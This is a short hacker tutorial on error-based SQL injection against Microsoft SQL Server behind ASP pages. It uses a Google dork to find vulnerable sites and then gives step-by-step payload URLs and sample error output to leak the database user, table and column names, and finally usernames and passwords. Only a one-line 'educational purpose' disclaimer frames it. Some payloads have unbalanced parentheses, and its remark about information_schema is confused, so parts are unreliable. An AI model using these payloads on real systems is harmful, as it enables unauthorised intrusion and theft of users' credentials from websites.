MSSQL
Injection
Ex: google dork
inurl:.asp?id=
find a result like :
http://www.somesite.com/some.asp?ID=12
Now to check if it is vuln or not
insert single quotation ' at the last :
http://www.somesite.com/some.asp?ID=12’
you get error like this:
-------------------------------------------------
Error:Microsoft
OLE DB Provider for SQL Server error '80040e14'
Unclosed
quotation mark before the character string ''.
/some.asp,
line 86
-------------------------------------------------
Then you can proceed
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)
(* here you can observe that we are trying
to convert but it doesn’t happen which inturn shows the db name that it cant
convert into int).
So it
shows error , by showing the db name like:
--------------------------------------------------
Error:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax
error converting the nvarchar value 'usr' to a column of data type int.
/some.asp,
line 86
---------------------------------------------------------------
In the error it shows some db name as “usr” .
Now
We try to bring all the available tables in a
database :
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables))
(here
information_schema is the database , this you can find in myphp).
We get error like :
----------------------------------------------
Microsoft
OLE DB Provider for SQL Server error '80040e07'
Error:
Syntax error converting the nvarchar value 'galery' to a column of data type
int.
/some.asp,
line 86
-----------------------------------------------
(here
table name is galery)
But no login credentials will be in the galery
table ,To find the Second table name
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))
we get table name as users
now to find columns in users table:
http://www.somesite.com/site.asp?ID=12+and+1=convert(int,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))
we get this
-----------------------------------------------
Microsoft
OLE DB Provider for SQL Server error '80040e07'
Error: Syntax
error converting the nvarchar value 'username' to a column of data type int.
/some.asp,
line 86
-----------------------------------------------
To find second column folow the above step like
finding the second table name
Now we need to find the values in the table with
columns username and password
http://www.somesite.com/some.asp?ID=12
and+1=convert(int,(select+top+1+username+from+users))
same as
like for finding value in password field too.
Got it.?
[ * Warning
: Im not responsible for your actions , this is for educational purpose only .
]